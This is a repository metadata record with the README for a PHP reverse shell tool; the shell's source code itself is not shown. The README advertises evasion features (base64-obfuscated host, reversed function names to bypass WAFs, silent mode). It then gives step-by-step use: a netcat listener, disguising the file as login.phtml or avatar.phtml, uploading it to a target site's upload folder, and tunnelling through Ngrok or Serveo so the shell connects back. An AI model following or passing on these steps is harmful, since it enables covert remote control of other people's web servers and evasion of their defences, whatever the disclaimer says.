{"id":29184368,"url":"https://github.com/s-r-e-e-r-a-j/php-reverse-shell","last_synced_at":"2025-07-01T21:31:15.786Z","repository":{"id":297779640,"uuid":"997881189","full_name":"s-r-e-e-r-a-j/PHP-REVERSE-SHELL","owner":"s-r-e-e-r-a-j","description":"This is a powerful and stealthy PHP reverse shell designed for ethical hacking and penetration testing. It establishes a reliable and quiet connection back to your machine.","archived":false,"fork":false,"pushed_at":"2025-06-16T12:01:04.000Z","size":68,"stargazers_count":3,"open_issues_count":0,"forks_count":0,"subscribers_count":0,"default_branch":"main","last_synced_at":"2025-06-16T13:20:27.857Z","etag":null,"topics":["ethical-hacking","penetration-testing","pentesting","php","php-reverse-shell","reverse-shell"],"latest_commit_sha":null,"homepage":"","language":"PHP","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/s-r-e-e-r-a-j.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE.md","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null}},"created_at":"2025-06-07T11:49:30.000Z","updated_at":"2025-06-16T12:01:07.000Z","dependencies_parsed_at":null,"dependency_job_id":"95dfe644-310b-4a6b-b01e-ce0ba0054503","html_url":"https://github.com/s-r-e-e-r-a-j/PHP-REVERSE-SHELL","commit_stats":null,"previous_names":["s-r-e-e-r-a-j/php-reverse-shell"],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/s-r-e-e-r-a-j/PHP-REVERSE-SHELL","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/s-r-e-e-r-a-j%2FPHP-REVERSE-SHELL","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/s-r-e-e-r-a-j%2FPHP-REVERSE-SHELL/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/s-r-e-e-r-a-j%2FPHP-REVERSE-SHELL/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/s-r-e-e-r-a-j%2FPHP-REVERSE-SHELL/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/s-r-e-e-r-a-j","download_url":"https://codeload.github.com/s-r-e-e-r-a-j/PHP-REVERSE-SHELL/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/s-r-e-e-r-a-j%2FPHP-REVERSE-SHELL/sbom","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":263038911,"owners_count":23404081,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["ethical-hacking","penetration-testing","pentesting","php","php-reverse-shell","reverse-shell"],"created_at":"2025-07-01T21:31:14.031Z","updated_at":"2025-07-01T21:31:15.751Z","avatar_url":"https://github.com/s-r-e-e-r-a-j.png","language":"PHP","readme":"## PHP Reverse Shell (Powerful \u0026 Stealthy)\nThis is a powerful and stealthy PHP reverse shell designed for ethical hacking and penetration testing.\nIt establishes a reliable and quiet connection back to your machine.\n\n## ⚠️ Disclaimer\nThis PHP reverse shell is developed strictly for educational and authorized penetration testing purposes only.   \nThe developer is not responsible for any misuse, damage, or illegal activity performed using this reverse_shell.     \nUse responsibly and only on systems you own or have explicit permission to test. Unauthorized access is illegal and punishable by law.\n## Features\n- IP and shell command are Base64 encoded for stealth \n\n- Function names are reversed to bypass WAF and security filters\n\n- Silent mode — no output displayed to avoid detection\n\n- Automatically reconnects if connection drops\n\n- Can run as a background daemon (if server supports)\n\n- Works on most PHP-enabled servers\n\n- Supports tunneling services like  Ngrok, Serveo\n\n- Upload with `.phtml` extension to bypass some filters\n\n## How to Use\n**1. Start a listener on your machine**\n```bash\nnc -lvnp 4444\n```\n**2. Encode your IP or hostname in Base64**\n\nUse this simple command:\n\n```bash\necho \"your_ip_or_hostname\" | base64\n```\n**Example:**\n```bash\necho \"192.168.1.5\" | base64\n```\nCopy the output and replace the $ip_b64 value in the PHP reverse shell script.\n\n**3. Update your PHP reverse shell script:**\n\nChange these lines with your Base64 encoded IP/hostname and port:\n\n```php\n$ip_b64 = 'YOUR_BASE64_ENCODED_IP_OR_HOSTNAME';\n$port = YOUR_LISTENER_PORT;\n```\n**4. Rename the file and upload**\n\nRename the file to something less suspicious, for example:\n\n- `login.phtml`\n\n- `avatar.phtml`\n\n- `update.phtml`\n\nUsing the `.phtml` extension helps the file run on some servers that block `.php`.\n\nUpload this file to the target website where file uploads are allowed.\n\n**5. Trigger the reverse shell**\n\nOpen the uploaded file in a browser:\n\n```arduino\nhttp://target.com/uploads/login.phtml\n```\nOnce opened, your listener will get a reverse shell connection.\n\n## Using Tunneling (When Your IP is Not Public)\nIf you're using mobile data or behind a router (NAT), your IP might not be public.\nIn that case, the reverse shell can't reach your machine directly.\n\nTo fix this, use TCP tunneling tools like Ngrok or Serveo.\n\n#### Ngrok (Recommended)\nInstall Ngrok   \nRun this command:\n\n```bash\nngrok tcp 4444\n```\nIt will show something like:\n\n```nginx\nForwarding tcp://4.tcp.ngrok.io:18900\n```\n**Update your PHP reverse shell script:**\n\n```php\n$ip_b64 = base64_encoded of 4.tcp.ngrok.io;\n$port = 18900;\n```\n**Start your listener:**\n\n```bash\nnc -lvnp 4444\n```\n#### Serveo\n\n**Run this command:**\n\n```bash\nssh -R 0:localhost:4444 serveo.net\n```\n**It will say something like:**\n\n```csharp\nForwarding TCP connections from serveo.net:46603\n```\n**Update your PHP reverse shell script:**\n\n```php\n$ip_b64 = base64_encoded of serveo.net;\n$port = 46603;\n```\n**Start your listener:**\n\n```bash\nnc -lvnp 4444\n```\n## License\nThis project is licensed under the GNU General Public License v3.0\n\n","funding_links":[],"categories":[],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fs-r-e-e-r-a-j%2Fphp-reverse-shell","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fs-r-e-e-r-a-j%2Fphp-reverse-shell","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fs-r-e-e-r-a-j%2Fphp-reverse-shell/lists"}